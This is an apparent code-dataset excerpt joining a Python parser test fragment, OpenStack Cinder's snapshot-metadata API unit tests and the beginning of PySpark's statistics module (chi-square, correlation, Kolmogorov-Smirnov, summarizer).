self.assertEqual(Flags(" foo , bar ").items(), {"foo", "bar"})
flags = Flags(
"max-size:120:2,font-family:DIN next pro,font-spacing:2, priority:140"
)
self.assertEqual(
flags.items(),
{
("font-family", "DIN next pro"),
("priority", "140"),
("max-size", "120", "2"),
("font-spacing", "2"),
},
)
def test_unicode(self):
self.assertEqual(
Flags("zkouška, Memóriakártya").items(), {"zkouška", "Memóriakártya"}
)
self.assertEqual(
Flags("placeholder:'zkouška sirén'").items(),
{("placeholder", "zkouška sirén")},
)
def test_replacements(
self, text='replacements:{COLOR-GREY}:"":{COLOR-GARNET}:"":{VARIABLE-01}:99'
):
flags = Flags(text)
self.assertEqual(
flags.items(),
{
(
"replacements",
"{COLOR-GREY}",
"",
"{COLOR-GARNET}",
"",
"{VARIABLE-01}",
"99",
)
},
)
self.assertEqual(
flags.get_value("replacements"),
["{COLOR-GREY}", "", "{COLOR-GARNET}", "", "{VARIABLE-01}", "99"],
)
def test_empty_params(self):
self.test_replacements(
"replacements:{COLOR-GREY}::{COLOR-GARNET}::{VARIABLE-01}:99"
)
def test_escaped_values(self):
flags = Flags(r"""placeholders:"\\":"\"" """)
self.assertEqual(flags.get_value("placeholders"), ["\\", '"'])
def test_set(self):
flags = Flags()
flags.set_value("variant", "Long string with \"quotes\" and 'quotes'.")
self.assertEqual(
flags.format(), r'''variant:"Long string with \"quotes\" and 'quotes'."'''
)
| gpl-3.0 |
takeshineshiro/cinder | cinder/tests/unit/api/v2/test_snapshot_metadata.py | 16 | 26072 | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import mock
from oslo_config import cfg
from oslo_serialization import jsonutils
import webob
from cinder.api import extensions
from cinder.api.v2 import snapshot_metadata
from cinder.api.v2 import snapshots
from cinder import context
import cinder.db
from cinder import exception
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit import fake_snapshot
from cinder.tests.unit import fake_volume
CONF = cfg.CONF
def return_create_snapshot_metadata(context, snapshot_id, metadata, delete):
return stub_snapshot_metadata()
def return_create_snapshot_metadata_insensitive(context, snapshot_id,
metadata, delete):
return stub_snapshot_metadata_insensitive()
def return_new_snapshot_metadata(context, snapshot_id, metadata, delete):
return stub_new_snapshot_metadata()
def return_empty_container_metadata(context, snapshot_id, metadata, delete):
return {}
def stub_snapshot_metadata():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
}
return metadata
def stub_snapshot_metadata_insensitive():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
"KEY4": "value4",
}
return metadata
def stub_new_snapshot_metadata():
metadata = {
'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
}
return metadata
def return_snapshot(context, snapshot_id):
return {'id': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'status': 'available',
'metadata': {}}
def return_volume(context, volume_id):
return {'id': 'fake-vol-id',
'size': 100,
'name': 'fake',
'host': 'fake-host',
'status': 'available',
'encryption_key_id': None,
'volume_type_id': None,
'migration_status': None,
'metadata': {},
'project_id': context.project_id}
def return_snapshot_nonexistent(context, snapshot_id):
raise exception.SnapshotNotFound(snapshot_id=snapshot_id)
def fake_update_snapshot_metadata(self, context, snapshot, diff):
pass
class SnapshotMetaDataTest(test.TestCase):
def setUp(self):
super(SnapshotMetaDataTest, self).setUp()
self.volume_api = cinder.volume.api.API()
self.stubs.Set(cinder.db, 'volume_get', return_volume)
self.stubs.Set(cinder.db, 'snapshot_get', return_snapshot)
self.stubs.Set(self.volume_api, 'update_snapshot_metadata',
fake_update_snapshot_metadata)
self.ext_mgr = extensions.ExtensionManager()
self.ext_mgr.extensions = {}
self.snapshot_controller = snapshots.SnapshotsController(self.ext_mgr)
self.controller = snapshot_metadata.Controller()
self.req_id = str(uuid.uuid4())
self.url = '/v2/fake/snapshots/%s/metadata' % self.req_id
snap = {"volume_size": 100,
"volume_id": "fake-vol-id",
"display_name": "Volume Test Name",
"display_description": "Volume Test Desc",
"availability_zone": "zone1:host1",
"host": "fake-host",
"metadata": {}}
body = {"snapshot": snap}
req = fakes.HTTPRequest.blank('/v2/snapshots')
self.snapshot_controller.create(req, body)
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_index(self, snapshot_get_by_id):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_obj['metadata'] = {'key1': 'value1',
'key2': 'value2',
'key3': 'value3'}
snapshot_get_by_id.return_value = snapshot_obj
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.req_id)
expected = {
'metadata': {
'key1': 'value1',
'key2': 'value2',
'key3': 'value3',
},
}
self.assertEqual(expected, res_dict)
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_index_nonexistent_snapshot(self, snapshot_get_by_id):
snapshot_get_by_id.side_effect = \
exception.SnapshotNotFound(snapshot_id=self.req_id)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index, req, self.url)
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_index_no_data(self, snapshot_get_by_id):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.req_id)
expected = {'metadata': {}}
self.assertEqual(expected, res_dict)
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_show(self, snapshot_get_by_id):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_obj['metadata'] = {'key2': 'value2'}
snapshot_get_by_id.return_value = snapshot_obj
req = fakes.HTTPRequest.blank(self.url + '/key2')
res_dict = self.controller.show(req, self.req_id, 'key2')
expected = {'meta': {'key2': 'value2'}}
self.assertEqual(expected, res_dict)
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_show_nonexistent_snapshot(self, snapshot_get_by_id):
snapshot_get_by_id.side_effect = \
exception.SnapshotNotFound(snapshot_id=self.req_id)
req = fakes.HTTPRequest.blank(self.url + '/key2')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.req_id, 'key2')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_show_meta_not_found(self, snapshot_get_by_id):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
req = fakes.HTTPRequest.blank(self.url + '/key6')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.req_id, 'key6')
@mock.patch('cinder.db.snapshot_metadata_delete')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_delete(self, snapshot_get_by_id, snapshot_metadata_delete):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_obj['metadata'] = {'key2': 'value2'}
snapshot_get_by_id.return_value = snapshot_obj
req = fakes.HTTPRequest.blank(self.url + '/key2')
req.method = 'DELETE'
res = self.controller.delete(req, self.req_id, 'key2')
self.assertEqual(200, res.status_int)
def test_delete_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.req_id, 'key1')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_delete_meta_not_found(self, snapshot_get_by_id):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
req = fakes.HTTPRequest.blank(self.url + '/key6')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.req_id, 'key6')
@mock.patch('cinder.db.snapshot_update')
@mock.patch('cinder.objects.Volume.get_by_id')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_create(self, snapshot_get_by_id, volume_get_by_id,
snapshot_update):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
fake_volume_obj = fake_volume.fake_volume_obj(ctx)
snapshot_get_by_id.return_value = snapshot_obj
volume_get_by_id.return_value = fake_volume_obj
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank('/v2/snapshot_metadata')
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key1": "value1",
"key2": "value2",
"key3": "value3"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.req_id, body)
self.assertEqual(body, res_dict)
@mock.patch('cinder.db.snapshot_update')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_create_with_keys_in_uppercase_and_lowercase(
self, snapshot_get_by_id, snapshot_update):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
# if the keys in uppercase_and_lowercase, should return the one
# which server added
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata_insensitive)
req = fakes.HTTPRequest.blank('/v2/snapshot_metadata')
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key1": "value1",
"KEY1": "value1",
"key2": "value2",
"KEY2": "value2",
"key3": "value3",
"KEY4": "value4"}}
expected = {"metadata": {"key1": "value1",
"key2": "value2",
"key3": "value3",
"KEY4": "value4"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.req_id, body)
self.assertEqual(expected, res_dict)
def test_create_empty_body(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.req_id, None)
def test_create_item_empty_key(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.req_id, body)
def test_create_item_key_too_long(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create,
req, self.req_id, body)
def test_create_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get',
return_snapshot_nonexistent)
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank('/v2/snapshot_metadata')
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.create, req, self.req_id, body)
@mock.patch('cinder.db.snapshot_update')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_update_all(self, snapshot_get_by_id, snapshot_update):
snapshot = {
'id': self.req_id,
'expected_attrs': []
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_new_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.req_id, expected)
self.assertEqual(expected, res_dict)
@mock.patch('cinder.db.snapshot_update',
return_value={'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20'})
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_update_all_with_keys_in_uppercase_and_lowercase(
self, snapshot_get_by_id, snapshot_update):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_new_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
body = {
'metadata': {
'key10': 'value10',
'KEY10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
},
}
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
'KEY20': 'value20',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.req_id, body)
self.assertEqual(expected, res_dict)
@mock.patch('cinder.db.snapshot_update')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_update_all_empty_container(self, snapshot_get_by_id,
snapshot_update):
snapshot = {
'id': self.req_id,
'expected_attrs': []
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_empty_container_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': {}}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.req_id, expected)
self.assertEqual(expected, res_dict)
def test_update_all_malformed_container(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'meta': {}}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.req_id,
expected)
def test_update_all_malformed_data(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': ['asdf']}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.req_id,
expected)
def test_update_all_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get', return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
body = {'metadata': {'key10': 'value10'}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update_all, req, '100', body)
@mock.patch('cinder.db.snapshot_metadata_update', return_value=dict())
@mock.patch('cinder.db.snapshot_update')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_update_item(self, snapshot_get_by_id,
snapshot_update, snapshot_metadata_update):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res_dict = self.controller.update(req, self.req_id, 'key1', body)
expected = {'meta': {'key1': 'value1'}}
self.assertEqual(expected, res_dict)
def test_update_item_nonexistent_snapshot(self):
self.stubs.Set(cinder.db, 'snapshot_get',
return_snapshot_nonexistent)
req = fakes.HTTPRequest.blank(
'/v2/fake/snapshots/asdf/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update, req, self.req_id, 'key1',
body)
def test_update_item_empty_body(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, 'key1',
None)
def test_update_item_empty_key(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, '', body)
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_update_item_key_too_long(self, snapshot_get_by_id):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.req_id, ("a" * 260), body)
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_update_item_value_too_long(self, snapshot_get_by_id):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": ("a" * 260)}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.req_id, "key1", body)
def test_update_item_too_many_keys(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1", "key2": "value2"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, 'key1',
body)
def test_update_item_body_uri_mismatch(self):
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url + '/bad')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.req_id, 'bad',
body)
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_invalid_metadata_items_on_create(self, snapshot_get_by_id):
snapshot = {
'id': self.req_id,
'expected_attrs': ['metadata']
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
snapshot_get_by_id.return_value = snapshot_obj
self.stubs.Set(cinder.db, 'snapshot_metadata_update',
return_create_snapshot_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
# test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.req_id, data)
# test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.req_id, data)
# test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.req_id, data)
| apache-2.0 |
zuotingbing/spark | python/pyspark/ml/stat.py | 4 | 23415 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from pyspark import since, SparkContext
from pyspark.ml.common import _java2py, _py2java
from pyspark.ml.linalg import DenseMatrix, Vectors
from pyspark.ml.wrapper import JavaWrapper, _jvm
from pyspark.sql.column import Column, _to_seq
from pyspark.sql.functions import lit
class ChiSquareTest(object):
"""
Conduct Pearson's independence test for every feature against the label. For each feature,
the (feature, label) pairs are converted into a contingency matrix for which the Chi-squared
statistic is computed. All label and feature values must be categorical.
The null hypothesis is that the occurrence of the outcomes is statistically independent.
.. versionadded:: 2.2.0
"""
@staticmethod
@since("2.2.0")
def test(dataset, featuresCol, labelCol, flatten=False):
"""
Perform a Pearson's independence test using dataset.
:param dataset:
DataFrame of categorical labels and categorical features.
Real-valued features will be treated as categorical for each distinct value.
:param featuresCol:
Name of features column in dataset, of type `Vector` (`VectorUDT`).
:param labelCol:
Name of label column in dataset, of any numerical type.
:param flatten: if True, flattens the returned dataframe.
:return:
DataFrame containing the test result for every feature against the label.
If flatten is True, this DataFrame will contain one row per feature with the following
fields:
- `featureIndex: int`
- `pValue: float`
- `degreesOfFreedom: int`
- `statistic: float`
If flatten is False, this DataFrame will contain a single Row with the following fields:
- `pValues: Vector`
- `degreesOfFreedom: Array[int]`
- `statistics: Vector`
Each of these fields has one value per feature.
.. versionchanged:: 3.1.0
Added optional ``flatten`` argument.
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.stat import ChiSquareTest
>>> dataset = [[0, Vectors.dense([0, 0, 1])],
... [0, Vectors.dense([1, 0, 1])],
... [1, Vectors.dense([2, 1, 1])],
... [1, Vectors.dense([3, 1, 1])]]
>>> dataset = spark.createDataFrame(dataset, ["label", "features"])
>>> chiSqResult = ChiSquareTest.test(dataset, 'features', 'label')
>>> chiSqResult.select("degreesOfFreedom").collect()[0]
Row(degreesOfFreedom=[3, 1, 0])
>>> chiSqResult = ChiSquareTest.test(dataset, 'features', 'label', True)
>>> row = chiSqResult.orderBy("featureIndex").collect()
>>> row[0].statistic
4.0
"""
sc = SparkContext._active_spark_context
javaTestObj = _jvm().org.apache.spark.ml.stat.ChiSquareTest
args = [_py2java(sc, arg) for arg in (dataset, featuresCol, labelCol, flatten)]
return _java2py(sc, javaTestObj.test(*args))
class Correlation(object):
"""
Compute the correlation matrix for the input dataset of Vectors using the specified method.
Methods currently supported: `pearson` (default), `spearman`.
.. note:: For Spearman, a rank correlation, we need to create an RDD[Double] for each column
and sort it in order to retrieve the ranks and then join the columns back into an RDD[Vector],
which is fairly costly. Cache the input Dataset before calling corr with `method = 'spearman'`
to avoid recomputing the common lineage.
.. versionadded:: 2.2.0
"""
@staticmethod
@since("2.2.0")
def corr(dataset, column, method="pearson"):
"""
Compute the correlation matrix with specified method using dataset.
:param dataset:
A Dataset or a DataFrame.
:param column:
The name of the column of vectors for which the correlation coefficient needs
to be computed. This must be a column of the dataset, and it must contain
Vector objects.
:param method:
String specifying the method to use for computing correlation.
Supported: `pearson` (default), `spearman`.
:return:
A DataFrame that contains the correlation matrix of the column of vectors. This
DataFrame contains a single row and a single column of name
'$METHODNAME($COLUMN)'.
>>> from pyspark.ml.linalg import Vectors
>>> from pyspark.ml.stat import Correlation
>>> dataset = [[Vectors.dense([1, 0, 0, -2])],
... [Vectors.dense([4, 5, 0, 3])],
... [Vectors.dense([6, 7, 0, 8])],
... [Vectors.dense([9, 0, 0, 1])]]
>>> dataset = spark.createDataFrame(dataset, ['features'])
>>> pearsonCorr = Correlation.corr(dataset, 'features', 'pearson').collect()[0][0]
>>> print(str(pearsonCorr).replace('nan', 'NaN'))
DenseMatrix([[ 1. , 0.0556..., NaN, 0.4004...],
[ 0.0556..., 1. , NaN, 0.9135...],
[ NaN, NaN, 1. , NaN],
[ 0.4004..., 0.9135..., NaN, 1. ]])
>>> spearmanCorr = Correlation.corr(dataset, 'features', method='spearman').collect()[0][0]
>>> print(str(spearmanCorr).replace('nan', 'NaN'))
DenseMatrix([[ 1. , 0.1054..., NaN, 0.4 ],
[ 0.1054..., 1. , NaN, 0.9486... ],
[ NaN, NaN, 1. , NaN],
[ 0.4 , 0.9486... , NaN, 1. ]])
"""
sc = SparkContext._active_spark_context
javaCorrObj = _jvm().org.apache.spark.ml.stat.Correlation
args = [_py2java(sc, arg) for arg in (dataset, column, method)]
return _java2py(sc, javaCorrObj.corr(*args))
class KolmogorovSmirnovTest(object):
"""
Conduct the two-sided Kolmogorov Smirnov (KS) test for data sampled from a continuous
distribution.
By comparing the largest difference between the empirical cumulative
distribution of the sample data and the theoretical distribution we can provide a test for the
the null hypothesis that the sample data comes from that theoretical distribution.
.. versionadded:: 2.4.0
"""
@staticmethod
@since("2.4.0")
def test(dataset, sampleCol, distName, *params):
"""
Conduct a one-sample, two-sided Kolmogorov-Smirnov test for probability distribution
equality. Currently supports the normal distribution, taking as parameters the mean and
standard deviation.
:param dataset:
a Dataset or a DataFrame containing the sample of data to test.
:param sampleCol:
Name of sample column in dataset, of any numerical type.
:param distName:
a `string` name for a theoretical distribution, currently only support "norm".
:param params:
a list of `Double` values specifying the parameters to be used for the theoretical
distribution. For "norm" distribution, the parameters includes mean and variance.
:return:
A DataFrame that contains the Kolmogorov-Smirnov test result for the input sampled data.
This DataFrame will contain a single Row with the following fields:
- `pValue: Double`
- `statistic: Double`
>>> from pyspark.ml.stat import KolmogorovSmirnovTest
>>> dataset = [[-1.0], [0.0], [1.0]]
>>> dataset = spark.createDataFrame(dataset, ['sample'])
>>> ksResult = KolmogorovSmirnovTest.test(dataset, 'sample', 'norm', 0.0, 1.0).first()
>>> round(ksResult.pValue, 3)
1.0
>>> round(ksResult.statistic, 3)
0.175
>>> dataset = [[2.0], [3.0], [4.0]]
>>> dataset = spark.createDataFrame(dataset, ['sample'])
>>> ksResult = KolmogorovSmirnovTest.test(dataset, 'sample', 'norm', 3.0, 1.0).first()
>>> round(ksResult.pValue, 3)
1.0
>>> round(ksResult.statistic, 3)
0.175
"""
sc = SparkContext._active_spark_context
javaTestObj = _jvm().org.apache.spark.ml.stat.KolmogorovSmirnovTest
dataset = _py2java(sc, dataset)
params = [float(param) for param in params]
return _java2py(sc, javaTestObj.test(dataset, sampleCol, distName,
_jvm().PythonUtils.toSeq(params)))
class Summarizer(object):
"""
Tools for vectorized statistics on MLlib Vectors.
The methods in this package provide various statistics for Vectors contained inside DataFrames.
This class lets users pick the statistics they would like to extract for a given column.
>>> from pyspark.ml.stat import Summarizer
>>> from pyspark.sql import Row
>>> from pyspark.ml.linalg import Vectors
>>> summarizer = Summarizer.metrics("mean", "count")
>>> df = sc.parallelize([Row(weight=1.0, features=Vectors.dense(1.0, 1.0, 1.0)),
... Row(weight=0.0, features=Vectors.dense(1.0, 2.0, 3.0))]).toDF()
>>> df.select(summarizer.summary(df.features, df.weight)).show(truncate=False)
+-----------------------------------+
|aggregate_metrics(features, weight)|
+-----------------------------------+
|[[1.0,1.0,1.0], 1] |
+-----------------------------------+
<BLANKLINE>
>>> df.select(summarizer.summary(df.features)).show(truncate=False)
+--------------------------------+
|aggregate_metrics(features, 1.0)|
+--------------------------------+
|[[1.0,1.5,2.0], 2] |
+--------------------------------+
<BLANKLINE>
>>> df.select(Summarizer.mean(df.features, df.weight)).show(truncate=False)
+--------------+
|mean(features)|
+--------------+
|[1.0,1.0,1.0] |
+--------------+
<BLANKLINE>
>>> df.select(Summarizer.mean(df.features)).show(truncate=False)
+--------------+
|mean(features)|
+--------------+
|[1.0,1.5,2.0] |
+--------------+
<BLANKLINE>
.. versionadded:: 2.4.0
"""
@staticmethod
@since("2.4.0")
def mean(col, weightCol=None):
"""
return a column of mean summary
"""
return Summarizer._get_single_metric(col, weightCol, "mean")
@staticmethod
@since("3.0.0")
def sum(col, weightCol=None):
"""
return a column of sum summary
"""
return Summarizer._get_single_metric(col, weightCol, "sum")
@staticmethod
@since("2.4.0")
def variance(col, weightCol=None):
"""
return a column of variance summary
"""
return Summarizer._get_single_metric(col, weightCol, "variance")
@staticmethod
@since("3.0.0")
def std(col, weightCol=None):
"""
return a column of std summary
"""
